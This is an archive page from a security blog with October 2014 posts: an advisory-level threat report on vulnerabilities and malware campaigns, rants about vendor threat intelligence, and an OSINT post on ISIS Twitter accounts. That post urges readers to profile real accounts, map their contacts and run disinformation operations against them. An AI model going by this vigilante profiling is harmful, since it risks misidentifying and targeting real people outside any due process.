Krypt3ia

(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)

Author Archive

GLOBAL THREAT INTELLIGENCE REPORT: OCTOBER 2014

leave a comment »

photo

GLOBAL Threat Intelligence Report – OCTOBER 2014

 

 

Executive Summary

This month saw another fundamental flaw in a commonly used encryption mechanism for transferring data (Poodle) as well as an uptick in the attempts on last months Shellshock vulnerability on the Internet.

Alternatively more alleged espionage campaigns were detected this month by actors such as Russia which used phishing and the usual methods that APT commonly use to attack entities that they are interested in. Within all of this there is a sense that today if you are on the Internet at all then you are compromised.

At a corporate level however, this should prick your ears and give you pause as your company may in fact be compromised actively as you read this report. Additionally, it is important to understand the nature of the threats out there as well as the threats you have within your own networks. Reliance on reports from threat intelligence firms without actual intelligence analysis for your own organization does little to stop the threats that you have in your own domain.

You will find within this report some highlights of what was seen over the month of October in attacks, malware, and geopolitically in the world of Internet and computer security. Use this information to inform your organization on the vulnerabilities out in the wild as well as the data from within your org that shows just how vulnerable you may be to threats like these as well as others that you already have in situ.Global Threats

Global Threats

Threat Intelligence Feeds:

Does your TI give you actionable Intelligence Analysis?

The Intelligence Cycle: https://krypt3ia.wordpress.com/2014/10/13/the-threat-intelligence-cycle-and-you/

Analysis:

Threat intelligence is being sold as a commodity today for many companies to use as a means to protect their networks and domains. However it should be noted that not all threat intelligence is useful to every company. Threat intelligence needs to be analysed by the local security team and the business to understand whether or not the intelligence is valid for their situation. Lately the intelligence that has been put out by the likes of FireEye and Mandiant and others have been about nation state actors that may not have any interest in your companies network in the first place. Thus it is important to gather what data the feeds do have and to apply rules as well as patches for those vulnerabilities reported upon. However, in some cases such as the APT campaigns by APT-28 to date do not have any applicable vectors for C&C’s or IOC’s unless you are in Ukraine or are a part of NATO.

On the other side of this equation though, the 0day that was used and the subsequent patches that will be put out by Microsoft will play a large roll in stopping further attacks that other actors (primarily criminal gangs) will use to try and leverage the 0day that now is in the open and available to anyone who may want to use it to attack other systems for non political goals. It is important for executives and management to understand that not all actors, specifically not all “Advanced Persistent Threats” you hear about in the news are the threats that you need to worry about. These are nation state actors who are targeting very specific things in order to further their political goals. These are espionage activities and thus it is important to understand them as well as understand your network, your data, and what you do as a company that “may” interest them in attacking you at some point even if it is just as a pivot point to attack someone you work with. An example of this would be the attack on Target via the HVAC company that had lower security levels than Target themselves. Vet all your intelligence feeds by analysing the data being given to you and align it to your business model and your network, security, and profile.

APT Espionage Activities:

Sandworm and APT-28

Two APT campaigns were recently unearthed by two different threat intelligence companies and released to the internet. The first of the two was dubbed “Sandworm” because the malware involved had certain words associated with the Frank Herbet Dune Triology encoded in them. APT 28 was recently reported on by FireEye and covers much the same territory by ostensibly the same actor (Russia and the FSB) against the same targets NATO, Ukraine and also in the case of Sandworm, some networks concerned with power generation and ICS systems.

https://nakedsecurity.sophos.com/2014/10/15/the-sandworm-malware-what-you-need-to-know/

http://thehackernews.com/2014/10/APT28-Russian-hacker-cyber-espionage.html

Analysis:

Both of these campaigns attacked the Ukrainian interests as well as NATO interests that the FSB and the Russian body politic is interested in. Where this type of activity meets many of your personal interests lay in the fact that the 0day that these campaigns used may be re-purposed for use by criminal gangs seeking to steal data such as credit cards and personal information. Seek out the reports on the 0day and the patches that go along with those reports from Microsoft to cover your patch cycles and insure that re-use is not possible in your environment. Also, since many crime syndicates in the Baltics tend to share command and control as well as coders with the FSB you should also input the C&C’s to insure that any traffic to them being re-purposed will be detected and blocked as well as reported on.

 

Malware & Crimeware

Crowti

Crowti Crypto-Malware Hits the United States

Win32/Crowti is a crypto-wall malware used to extort the end user in to giving money to the attacker to decrypt their files after infection. The system once rebooted will be encrypted and all access to it blocked by the attacker unless payment is received. The hard drive of the system will be encrypted thus all the data that is on the machine is subject to the extortion. This malware is being sent through various phishing campaigns and purportedly is being loaded onto machines via a framework of phishing/hacking software used by criminal gangs.

http://news.softpedia.com/news/Crowti-Crypto-Malware-Hit-the-United-States-463623.shtml

Analysis:

This attack has spiked in October from 4000 systems infected just within this month alone. The phishing campaigns distribution of the ransomware is carried out through spam email with malicious attachments posing as documents (invoices, faxes, complaints, reports) or missed call messages. If you are seeing this traffic you should block the subjects, sender, IP’s and any other pertinent details in your SPAM systems to block them coming in. If you are infected with the malware do not pay the ransom as reports of this have shown that they keys are not forthcoming from the extortionists. Instead you should re-image the machines infected and hopefully have backups of the data that was lost on the affected systems.

Multiple Infection Phishing Campaign

Remittance Confirmation

Site Management Services (Central) Ltd Remittance Confirmation – Word doc malware

An email saying Please find attached Remittance and BACS confirmation for September and October Invoice pretending to come from random names, companies and email addresses with a subject of Remittance Confirmation [random characters) is another one from the current bot runs which try to download various Zbots,cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers.

http://myonlinesecurity.co.uk/site-management-services-central-ltd-remittance-confirmation-word-doc-malware/

Analysis:

This malware campaign started October 31st 2014 and has been undetected by many AV clients so far. The only one to see this as malware early on was SOPHOS as a trojan. The file attached with the malware today was a .doc file (ZY5088152.doc) and when the file is opened the doc is empty but macros within the word file attempt to download malware. The campaign to date has been widespread and as such everyone should be on the lookout for this attack. The email subject is;

REMITTANCE CONFIRMATION *insert random string of numbers*

Once loaded the malware will attempt to download other packages (anything and everything it seems) in a gangbuster attempt to infect the machine in order to steal keystrokes and banking data.

Dyre/Dyreza

Phishing Campaign Linked with “Dyre” Banking Malware

The Dyre malware allows hackers to steal online bank passwords and other identification by infecting users’ computers to make it seem they are communicating with their financial institution via fake pages and or re-routing traffic in their DNS. Alternatively the malware installs a keystroke recorder and just records all actions until it captures the data the attackers want. The malware is spread by varying phishing attacks and is still evolving. The most common attack vector has been phishing emails with malware laden pdf files. The campaigns also have been using 0day attacks CVE-2013-2729 and CVE-2010-0188 in adobe reader.

https://www.us-cert.gov/ncas/alerts/TA14-300A

Hackers’ new Dyre malware infects W.Pa. computers, vexes FBI cyber agents

http://triblive.com/news/editorspicks/7047006-74/dyre-hackers-malware#ixzz3HkJCrg33

Analysis:

The Dyre malware has been around since September of this year and still poses a threat. It is recommended that everyone patch for the Adobe vulnerabilities that have been seen used with these attacks as well as increase user awareness to disallow for the files to be opened. The user is the front line of the fight against malware and phishing, as such they should be as aware as possible of the dangers of opening unverified files and links from emails that they are not familiar with who the sender is. Additionally these programs of awareness should extend to phishing your own environment as a part of education to re-educate users who consistently click on links and files without checking them first.

 

Hackers using Gmail drafts to steal data and update malware

A malware and hacking campaign recently detected is using Gmail draft files to infect and connect with command and control systems without ever having to hit send on the mail itself. It is unclear what the malware type is exactly but the command and control method along with the use of Gmail as the channel is novel.

“What we’re seeing here is command and control that’s using a fully allowed service, and that makes it superstealthy and very hard to identify,” said Wade Williamson, a security researcher at Shape. “It’s stealthily passing messages back and forth without even having to press send. You never see the bullet fired.” ~itproportal.com

http://www.itproportal.com/2014/10/30/hackers-using-gmail-drafts-steal-data-and-update-malware/#ixzz3HkJSdTds

Analysis:

This attack seems to be very targeted and may end up being part of a release later on in a bigger campaign that will either be nation state or crimeware driven. The interesting bit is the use of the Gmail C&C method to communicate. This is something to keep your eye on for the future as well as to consider the use of Gmail within your domains as either personal or corporate business. It is really a bad idea to carry out company business on services like Gmail but some places actually allow it. In either case, now this may allow a new channel using python code to ex-filtrate data from your network.

 

Vulnerabilities

Poodle

POODLE vulnerability in SSL 3.0

Poodle is the name for a vulnerability and attack on the SSLv3 protocol. This is an older protocol and everyone should be at TLS level now as the de-facto means of SSL encryption for the tunnels today. However, a flaw in the old code allows for a block cipher decryption attack via a “Man in the Middle” attack. This means that an attacker would have to route traffic through an intermediary system to gain access to raw traffic (2k packets) to attempt to decrypt it and get the key cipher to continue reading all of the traffic thereon.

http://www.kb.cert.org/vuls/id/577193

Analysis:

 This vulnerability and attack is more commonly available to attackers who have assets in place to attack the encrypted session. This means primarily that the best way to attack this is to do this while someone is on a rogue WIFI AP or in certain other scenarios. This would be more prescient for any mobile users (i.e. at a cafe working) than anywhere else. It is important that within your environment you disable SSLv3 from being allowed as a protocol for all browsers and if you have systems that are connected to the internet they too should b disallowed from using SSLv3 and set to only use TLS. This is actually being forced on many who use browsers now by default with new installs of Chrome and other browsers today.

WGET:

Wget creates arbitrary symbolic links during recursive FTP downloads

GNU wget allows arbitrary filesystem access when creating symbolic links during a recursive FTP download. This allows an attacker to overwrite files with the permissions of the user running wget. A malicious FTP server, when configured to provide symlinks in the directory listing, can force the client wget utility to enter into the the specified local symlink, navigating the local file system for the attacker. Wget will then download and create or overwrite existing files within the local symlink, setting permissions to those of the remote files.

http://www.kb.cert.org/vuls/id/685996

Analysis:

 This attack can be detrimental depending on the rights at which the attack happens. If you are using a UNIX FTP that is configured with the right account levels this attack may be limited. If however the acct that the attacker uses has too many rights on the machine it could lead to further compromise of the system. It is recommended that everyone patch for this vulnerability as well as consider the need for FTP in the first place. What data do you have going in and out of an internet facing FTP? Should you not be using a secure FTP to start with?

DRUPAL

Drupal Releases Public Service Announcement

Drupal released a public service announcement to address active exploitations of a previously patched vulnerability found in Drupal core 7.x versions prior to 7.32. Automated attacks began compromising Drupal 7 websites that were not patched or updated to Drupal 7.32 within hours of the announcement of SA-CORE-2014-005 – Drupal core – SQL injection. You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement.

https://www.us-cert.gov/ncas/current-activity/2014/10/29/Drupal-Releases-Public-Service-Announcement

 Analysis:

There is an ongoing SQLi attack against Drupal that updating the system to the current patch will negate. This attack has been seen in the wild in an automated attack and should be updated as soon as possible to prevent compromise. Attackers may have copied all data out of your site and could use it maliciously. There may be no trace of the attack.

IBM WebSphere

IBM WebSphere Application Server contains multiple vulnerabilities

IBM WebSphere Application Server, including the Hypervisor Edition, contains a cross-site request forgery (CSRF) vulnerability in the Administrative Console. The application also provides a URL that allows authenticated users to directly create and modify their session variables (“Session Injection”), including CSRF tokens.

http://www.kb.cert.org/vuls/id/573356

Analysis:

A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user’s browser session. Additionally, a remote unauthenticated attacker may be able to trick an authenticated user into making an unintentional request to the web server which will be treated as an authentic request and may result in information leakage or modification.

0Day

Microsoft CVE-2014-4114 (SANDWORM)

Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a “Sandworm” attack in June through October 2014, aka “Windows OLE Remote Code Execution Vulnerability.”

https://technet.microsoft.com/library/security/ms14-060

Analysis:

An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions. This 0day has been patched now with MS14-060 This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a Microsoft Office file that contains a specially crafted OLE object. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Directed Threats

<enter your own data here from IDS/SIEM/AV/LOG CORRELATION> for your own organization and report on what you are seeing on your network.

WORD FILE: to download and tailor to your org and give to your execs is HERE

Written by Krypt3ia

2014/10/31 at 20:39

SAND APT WORM 28 Screedle

leave a comment »

THISISMARKETING

 

SANDWORMS AND APT’S

Recently there has been a hubbub over iSight’s dox drop on what they called Sandworm. This was a group of Russian actors (alleged) that were spying digitally on Ukraine and NATO with malware and phishing. The program had been ongoing for a long time and iSight needed that market share so they dropped their report on us all, ya know, to let us all know that Russia spies on shit like Ukraine when they are in a heated battle with that runaway state.

WHO’DA THUNK IT??

Anywho, now FireEye wants to get in on the action and has dropped their report on APT-28… AKA Sandworm. They pretty much say the same things. There’s a group of Russians out there spying digitally on Ukraine and NATO with malware and phishing.

WOO

At least the FireEye report is less derpy than the iSight report so there is that. Sure the APT-28 report gives more IOC’s and such for the technowonks out there to follow up on and maybe put in C&C’s on their collective SIEM’s but really, what use is all this to the rest of us? Nada. Nada and this burns my ass. I really hate all this posturing bullshit marketing that passes for intelligence. To my amazement even the FireEye report states that this is nothing new and that these guys have been in the news in security circles for some time. Now it’s just time to make them a new BUZZWORD for the marketing and this is what makes me apoplectic about all of these services out there.

What have we learned here in this report?

  • Russian APT uses phishing
  • Russian APT uses obfuscation in code
  • Russian APT use Cyrillic keyboards
  • Russian APT knows more than one language
  • Russian APT are sneaky

No.. Really? As the report remarks, there is nothing new here.. So why post it?

MARKETING

All of this from FireEye as well as iSight is just tit for tat marketing to garner media attention for their “services” and nothing more. There is nothing in this report that really applies to the average blue team player unless you are in Ukraine or in NATO and ya know what? Those guys already know because they have been briefed by the intelligence agencies. So really, there is very little value to these reports to the common security player. It’s all just marketing HOODOO and we should all just see it as that ok?

“But it’s cool and now we have TTP’s on the Russki’s” you say… Well fuck that. The intelligence agencies are the players in that space not you. How many of you out there not in Defense base companies have EVER run into a known C&C for APT on your networks actively being used?

…. Anyone?

Yeah, thought so. Look, FireEye reports are the new EBOLA of ISIS! It’s utter wankery.

POLITICS

Meanwhile, some on my time-line asked a very pertinent question.. “Just how long has FireEye been the US governments lapdog anyway?” To which my answer was “since APT-1″ This report feels more like a mix of marketing as well as political pokery on the part of FE for the US government who happens to be having a pissing match over Ukraine and general Pooty Poot fuckery. So really, is this a report that we can all use or is this just a grab for political fuckery and money through self aggrandizing and self serving marketing to preserve market share that maybe iSight was perceived to have taken from them?

Your mileage may vary…

K.

Written by Krypt3ia

2014/10/28 at 17:13

Posted in .gov, .mil, APT

Tweeter, Jihadi, Soldier, Spy: OSINT in the Twitter JIHAD

with 3 comments

snapshot43

 

IS and the Propaganda Wars

Since the time that Zarqawi created AQI and got UBL’s approval the latter day ISIL/IS/Daesh group was a rag tag crew of angry guys looking to blow shit up. Post Abu’s passing and with the rise of Abu Baqr, the ISIL/IS/Daesh group has grown not only in numbers but also savvy on messaging and recruiting. Of course some of this has to do with the shifting nature of the region given all the politics and US screw ups since the invasion in 2003 that allowed for the group to coalesce into what we have today running amok in the region. Once the group really gained traction though, and AQ even turned their back on them for being too brutal, the IS became a force to be reckoned with in the area but now they have spread onto the internet as a means of propaganda warfare and recruitment. Much to the United States chagrin they have been all too successful in propagating their message as well as giving fodder to the main stream media to roll out the fear machine and set it to eleven.

Twitter Jihad

f6d410a8-0af6-4139-94bd-93c9a1cf8627_16x9_600x338

Primarily the IS took the model that AQAP had started and learned what AQAP did not. IS is much more capable at propaganda and slick messaging than AQAP ever was. IS has even now started it’s own magazine “Dabiq” which is much like the Inspire magazine but seems to be much more art directed than Inspire was. Now the Daesh has even broken into full blown advertising with small propaganda films that film school students probably look at and swoon over for their slick nature and editing. These things though do not have as much reach without the Twitter Jihad that is going on in tandem and as their medium for dissemination.

Twitter has been the battle ground of late in the war of ideas between IS and the world. Of course the US has decided that either the accounts on Twitter should be banned (or maybe that is just Twitter making that decision?) but it seems that the net effect here is a great game of whack-a-mole while the world burns. The US has frankly been stymied to come up with a good solution to the problem of the propaganda that IS has been using to get the ummah to come to the jihad but recently they decided that trolling might be the answer they need.

turnaway

Of course what I would call trolling is not what I am seeing out of the Department of State’s account at all. I am seeing reasoned arguments that are aimed at unreasonable individuals or those who may have some mental issues that need addressing. By being logical and refuting the call to this particular type of jihad you are just going to maybe get a lock on the rational individuals. However, Daesh wants only the cream of the crop in the whacknuttery department to join their ranks or to self radicalize and act out their fantasies here in the West. Much like I would assume the attacker from yesterday in Canada did with his shootem up at the capitol.

Frankly, I have no solid answers on how to respond to all of this. I would love to see some plans in action that would stem the tide here and perhaps staunch the flow of propaganda and jihad on Twitter. So far the only thing I can come up with is what you will see below for those who are either interested in watching the great game at a larger scale or perhaps to get inside of it a little more and work towards some asymmetric solutions. Perhaps the likes of Anonymous and others would truly “Troll” these players and drive them to drink, spending more time wasting time setting up accounts than actually placing their crap online.

… Just a thought…

On the other end of the spectrum this will be a little primmer on perhaps how you might use some tools to get closer to these guys. By getting closer I mean more in the HUMINT side of the house because as we are seeing they are learning that their metadata is on the Twitter as well. A recent manual that came out from Daesh instructing the brothers on how to stamp out their metadata and specifically called out the fact that geotags had been a problem. Well, as you can see at the top of this post that yes, this is a problem for them. However, I would posit that unless you are watching them real time somewhere in the bowels of Twitter HQ the latency issue becomes a key factor in whether or not we can send a drone and a hell-fire up their asses.

metamanual

Clearly they are learning from their mistakes and it seems of late that the Bellingcat is out of the bag here with regard to things like looking near real time at their metadata through their posting of images and tweets from places like Raqqa and elsewhere. It was this manual that prompted the post you are reading now in fact. After looking at all the data and seeing the immensity of the accounts online now that are jihadi related I think that it’s just too much for the government to handle. For that matter I think it is certainly too much for the private companies to handle as well and once you come to that conclusion you then have to think about how well they don’t all talk to each other. In the end there is a morass out there and from all intents and purposes today from what I have seen the government has no idea what to do about it. There’s just too much noise to even get the signal and soft trolling is just pathetic.

Recon

So it comes to this, I have decided that the best way of creating some tension that might cause pain to the Daesh is to give you all a taste of recon and OSINT on the Daesh. There are many tools out there you can work with and certainly there are fools with tools out there but I would like to see some smarter approaches here. So here goes…

Some tools:

  • Recon-ng
  • Mentionmap
  • Maltego
  • twiangulate
  • twtrland
  • EXIF tools (online and off)
    • regex.info
    • Foca
    • A raft of other command line tools in live distro’s for forensics

It’s a toolbox really and you put the right tools in there that you like and do the job. I am sure you all out there have others you like. These are just a few of the ones I use daily for my fun and games. Lately though I have been leveraging Recon-ng for their twitter features and will be expanding even further into the youtubes and other modules that they have for this kind of work. Suffice to say that you can really profile people on Twitter for example with just this tool alone. Below are some of my outputs for you to see.

snapshot12Supporter in Raqqa tweeting 10.17.2014Recon-ng of user on Twitter who is a player within Daesh and is in Syria

snapshot16Another user logging their connections including their DM connections

AbuAdamAlAmrikiA map of a user and who they talk to/mention with frequency as well as hash tags

snapshot41Supporter in Raqqa tweeting 10.17.2014

 

All of this data is pretty easy to get once you have the right tool sets and a good place to start looking. I leveraged a couple of accounts that I knew of (Adam Gadhan and Juni Al Britani) but you can use others. I will say though once you start spidering ou you will see a flood of accounts out there that are like minded. The trick though is to locate all those users in country and who are real players in the Daesh palooza and this is where you have the analysis phase of the game. As I have said in my posts about Threat Intelligence, it’s all about the analysis and product. If you don’t carry out the analysis well it all means nothing.

PS.. if you don’t know the tools go learn. I am not here to teach you how to use them. Buy the ticket… Take the ride.

Analysis

Analysis of the data here is the part of the cycle that takes a human being. Someone who can make connections as well as verify them. Tools are great but there are many fools with tools out there as I said above so if you use the tool but you fail in the analysis then you will give bad data in the form of connections that are incorrect. In the case of the Twitter jihad you have to have some idea of who you are dealing with. Are you in fact dealing with a real player who is in Raqqa or Ramadi or are you dealing with a wannabe in the US? You have to actually look at all the traffic, understand the language, and the psyche to make any real headway here. Just grabbing user names won’t do and it certainly won’t do if you cannot even Google translate a bit of the language to even have an idea of what is going on.

By analysis of the connections and reading the tweets you can then react appropriately by:

  1. Passively collecting intelligence
  2. Actively collecting intelligence
  3. Actively degrading their activities through disinformation operations
  4. Actively reporting their activities to authorities (thus degrading their capacities through blocks)

I am advocating all of these things now because this is just Twitter. This stuff is public to begin with and as such it is not like they are planning operational details through Twitter. They are instead advertising really and that to me is up for grabs for the common folk on the internet to attack. I am sure some out there will have a hissy about all of this (Flashpoint, lookin at you Evan you dickweed) but I don’t give a crap. This stuff is just polluting the weak minded and any way to stop it in my book is sauce for the gander.

If you are going to do this then you had best learn OSINT and intelligence analysis. If you want to just scrape names and pass them to Twitter to block, fine, but at least give them the real players and not some hapless reporter ok? Do the work, learn the tools and make a difference.

Asymmetric Response

So what I say to you all out there is pick your plan and go with it. Give the daesh a pain in the ass. I know that in the past Anon’s have been threatening all out war on the jihadi’s on Twitter and I have seen a bunch of nothing come of it. Doxing these guys will only work if they are in the US or another country where they can be picked up.I do fully support the idea though that if you are going to do this then you report them to the authorities. Drop the FBI a dump of accts and maybe some of these guys /girls can get picked up before they pull a stunt like we have seen with be-headings to mass shootings.

The governments trolling is not working and it seems that more and more of these accounts keep popping up. I mean hell, Juni’s on his 103’rd acct right?

Derp.

Just do a good job.. No half ass attempts.. And remember.. I am watching you Daeshbags!

K.

Written by Krypt3ia

2014/10/23 at 13:24

The Threat Intelligence Cycle and YOU

with 2 comments

Screenshot from 2014-10-13 09:51:41

The Cost Benefit Analysis of Threat Intelligence:

Over the weekend I got a call from @packetknife who began to question me on some of the finer points on the threat intelligence post I put up recently. The primary thing of it all kind of boiled down to “So what’s the cost benefit analysis here” which was not meant in money but really in overall efficacy. What real good would come from having a threat intelligence capability that really could be more broadly expanded to such things as competitive intelligence and the like.

It was a good question and it is something that I had talked about before in my BsidesLV presentation on this subject. To cut to the chase here the point is that if you create a capacity and you generate intelligence from analysis of the “data” being given to you as well as what you are seeing in your own logs, then you have analysis and information that can be used to inform management. Management may not be really aware of these things and they should by all rights be in today’s age of the weekly compromise announcements. Business decisions are made every day concerning the security of a company and all too often as we have seen lately those decisions may not have been the best for the security of the companies found to be compromised and losing data. A for instance would be Home Depot using SEP 11 as their primary means of protection against malware or, even at a lower scale, the use of MalwareBytes by the heating and cooling company that was the launch point for the attack on Target.

There is a cost benefit to having your own program of looking at the data as well as the so called intelligence you can get from a portal and that benefit lies in not only technical means (i.e. blocks in firewalls and sigs in SIEM’s) but also awareness on the part of the org and it’s leaders as to what is happening in the world and how that may effect your organization. Of course your leaders have to be available to this kind of thing and they have to have it spoon fed most of the time but if you get those things squared away you will make your life a little easier in trying to defend the organization as they might have some clue as to why you are warning about something.

Rubber Meeting Road:

Some *cough Ali cough* might question whether or not this is something that anyone other than a government or perhaps a defense base corporation would care about. I agree, it may be a tough sell at times but I have no doubt that there is a benefit to some form of this program being in any corporation that has a security presence. I am not saying you need to get more bodies and form a group solely dedicated to this function (though that would be nice) but instead are saying that the function at least has to exist in some working fashion to make your security program work as a whole. Without these insights you are pretty much going to be only reactive and not proactive and this is bad.

If you really look at this you are not just reporting on what is going on in the world but also enlightening your management about your environment as well. If you say run a scan on your network and locate five NT machines that run rather important functions within your business you should generate intelligence that your network is at risk from NT being there as an outdated and unpatched system. Additionally you would be able to add context through analysis that those very important systems, were they to fall down and go boom or be hacked. could cause major issues for the company. Now, do you get that in vuln scans? Yes, you do. However, I would ask whether or not those scans ever make it to management in the first place? Secondly, do they actually have analysis as to WHY this is a rather important issue?

See where I am going here? The scan is DATA but the analysis is INTELLIGENCE…

Adding more analysis by marrying what you have that is vulnerable in your environment as well as analysis as to why it is there now and what the potential problems are in it remaining so as well as current attacks out there that may be going after such things is “Threat Intelligence” Am I making any sense here to you? Threat Intelligence (now TI in the vernacular as I see in my Twitter feed) is the sum total of all your scans, your feeds, and your intelligence gathering internally and externally to inform your business. It is up to them after you have informed them to accept the vulnerabilities after they comprehend them. That comprehension delivery is what you are doing in the form of TI.

Whether or not companies and management guys will buy into it is really the key part of the problem. I personally found that I had to take a page out of Jayson Street’s book and just did it. I created reports and I sent them to the management. Once they got the spoon fed fifth grade reading level informatics of what was going on the light-bulb got turned on. Does this mean that they react on larger issues that should be taken care of? No, it doesn’t. However, I have informed them and keep them up to date on what their overall security posture is like and that at the end of the day is all I can ask. It is after all their business. I only inform…

Your mileage may very.

K.

Written by Krypt3ia

2014/10/13 at 15:40

The Threat Intelligence Cycle

with one comment

sis_lifestyle

 

Nomenclature:

Lately I have been seeing more people coming to the realization that all of this threat intelligence for sale out there from vendors may or may not be what they claim it is. I for one have been thinking that much of what is out there today is either of poor quality or mostly not relevant to the users who are buying the data. It’s that last sentence though that most of the time I try to get across to people through this blog and elsewhere. To wit, most of the time what you are being offered by these threat intelligence firms is data, not necessarily intelligence and this is a nomenclature issue that I think is important.

Intelligence by the very definition is this;

Screenshot from 2014-10-02 14:51:57Meanwhile intelligence requires analysis to make sense of all that data:

Screenshot from 2014-10-02 14:54:05http://en.wikipedia.org/wiki/Intelligence_analysis

Often what you get from an intelligence portal is data and analysis of actors that you may never have to deal with and who are not targeting you. Data that comes from honeypots and perhaps incidents from other clients but those clients and that data may not be in your vertical as well so what bearing do they have on you? Another question to ask at this time is whether or not the intelligence analysis was carried out by a trained intelligence analyst or not. Often times today we see intelligence output that is flawed due to poor data and or suppositions made from bad attribution and other factors. So really how much can you trust that intelligence report to start with and secondly does that information even have relevance to your organization or network infrastructure?

Once again the militarization of the internet and the information security field has led us astray with nomenclature that sounds cool but may not really fit the needs of INFOSEC outside of a military or government sphere of influence. So now that you have some idea of the nomenclature issues around all of this I would like to take up the notion that what most of you now get from so called threat intelligence outfits is really just data and not so much intelligence.

Data Versus Intelligence:

When you buy into a threat intel feed you most of the time get emails with data. Command and control IP’s, malware hashes, and things like that. You may have a portal where you can look up specific actors (Crowdstrike for example) and get a sense of who they may be and how they operate but really, do most of you out there really digest that data and use it to inform your management or the direction of your security program? On average I would say that the bulk of what companies do today is take C&C data or bad actor data and then place that into their own IDS or firewall rules to attempt to stop those types of attacks. This is not intelligence consumption, this is data consumption.

A yara rule or other TTP data is just that, data. You could very well throw away the rest of the report (which I assume many do) and just move on. Intelligence has consumers and that intelligence has to be created for that consumer. If you are a financial institution and your threat intelligence feed does not cover crimeware that steals credit card data how much good is it to you? Don’t get me wrong, having that data to put into your IDS/Firewall as a proactive prophylaxis is great. Yet still it is not intelligence. Thus I say again most of what you guys are buying is not true intelligence unless you get a tailored report for your company that covers data from your environment as well as information about actors who would wish to or have attacked it. This direct information would help the management and the staff make decisions on the direction of security and the overall threats to the environment that need to be addressed.

Good Intelligence Versus Bad Intelligence:

Next I would like to tackle the idea of when intelligence is bad and when it’s good. Intelligence analysis is never easy and it is never one hundred percent accurate. A simple example of this idea would be the conversation between former CIA director George Tenet and former President G.W. Bush regarding Saddam’s WMD’s.

“George, how confident are you?” the president asked Tenet, in an exchange depicted in Bob Woodward’s book “Plan of Attack.”

“Don’t worry, it’s a slam-dunk,” Tenet said.

Well, there were no WMD’s and the intelligence came from the WHIG (White House Iraq Group) which was run by and lorded over by Vice President Dick Cheney. Intelligence can be misguided or it can be deliberately led astray to be used to influence decision makers and it is the same with threat intelligence in the Infosec world. Within this blog post though we are talking about intelligence on actors who may only be known from very small bits of data in code or IP addresses that were used in the attacks. This attributional data is what many of the threat intelligence firms hang their hats on and the reality of it all is that IP attribution is highly dubious given the nature of the internet to start. There are no slam dunks here no matter what a provider may tell you about a specific actor that they have been watching.

So when you buy into a program for intelligence you have to look at it from the following perspectives;

  1. Does the threat intelligence firm have a feed from your systems? (i.e. log correlation)
  2. Do they know your business?
  3. Do they know how you operate day to day technically?
  4. Do they cover more than just APT actors? (i.e. teh sexy)
  5. Do they give you a report every month on actors that specifically would be interested in your business?
  6. Do they give you a report that is tailored to your environment with your vulnerabilities?

If your threat intelligence vendor does not give these things to you then I would say that you are not getting “Threat Intelligence” at least none that you could use really. What you may be getting in fact is “data” that you can use as a tactical tool to be proactive and block certain attacks and maybe some actors. Mostly what I want to say to you is that I have a little aphorism that I love and it is this;

“A fool with a tool is still a fool”

There are many tools out there that call themselves threat intelligence firms and there are many fools out there who gladly use those tools without any real effect in securing their environments. I am planning on a post later on about the issues around intelligence gathering and analysis. This is a large topic and I think it best be something stand alone for you all to look at. I just wanted to give you all the main idea here that what you are all buying isn’t really intelligence.

“Caveat Emptor” people.

The Intelligence Cycle:

Let’s talk about the intelligence cycle for a bit now that we have gone over some of the misapprehensions out there today over threat intelligence. You the consumer of this information should have a goal or benefit in mind for paying for this service right? Well unless you have a team that can digest the information or alternatively a vendor who creates reports that execs can read and understand on the threats out there for their companies you will find that it all just means Greek to you. So to understand all of this better you need to understand the intelligence cycle itself.

Below are the precepts of intelligence as a cyclical practice to first understand the problems you have, then collect data, analyse it, and then report on the threats.

  • Setting Objectives
  • Information Collection
  • Data Analysis
  • Analysis and Reporting
  • Threat Assessment (aka) A Threat Intelligence Assessment

sis_lifestyle

Can you in fact count on your vendor to be using this cycle to identify the threats to you? I find that usually this is not what they do as I said above. This means that you and your org have to create your own team or buy into a vendor who will do all of these things for you. Without this all of the data being thrown at you is just data without real context and that certainly would be the case without people in your environment making sense of the data and responding to it appropriately for your organization.

Next Generation Threat Intelligence:

Well, I have explained the nature of intelligence and the cycle as well as touched on what bad intelligence is as well as just plain old data. Now though I would like to cover the idea of what I see as the next generation of threat intelligence. As I said above, unless a firm is selling the full package and has a lot of insight into your business and infrastructure you need to create your own intelligence function inside your Information Security infrastructure.

What this really means is that you will have to get some people and some resources to collect the data on your environment and what you are seeing. You will then be able to perhaps augment this with feeds from outside vendors and use it all to synthesize an analysis that is tailored to your org. Once you do this and you have a functioning intelligence organ you can be proactive to threats that are seen in the wild as well as those that you are seeing coming directly at you.

Carry out the following functions:

  •  In House Data Collection
  • Augmentation With Outside Data and Intelligence Analysis
  • True Threat Intelligence Using YOUR Data and Shared Resources
  • Identifying Threats To YOUR Environment
  • Reporting

In some cases such as some large banks (BofA) have their own intelligence wings that purportedly not only take feeds from the Crowdstrikes of the world but also use other OSINT techniques. These groups also use human assets and behavioural modelling to generate reports of threats out in the real world that may directly affect them. This is another level of intelligence gathering that you may also want to take up later on. First though, if you are going to say you are using threat intelligence then you had better have one of the two scenarios above. Otherwise you are not using threat intelligence at all. You are just floundering in a sea of data that may or may not pertain to you at all.

My recommendation to you all is that you consider setting up a group that does this. If you have feeds then have people in that portal looking at all of the data that they have. Look at how actors operate and who they target. Perhaps there are things you can intuit from their reports. However, the big goal here is to work with YOUR environment. The phrase “Know Thyself” comes to mind here and it would be a true statement on what you should be working towards in threat intelligence.

 Conclusion:

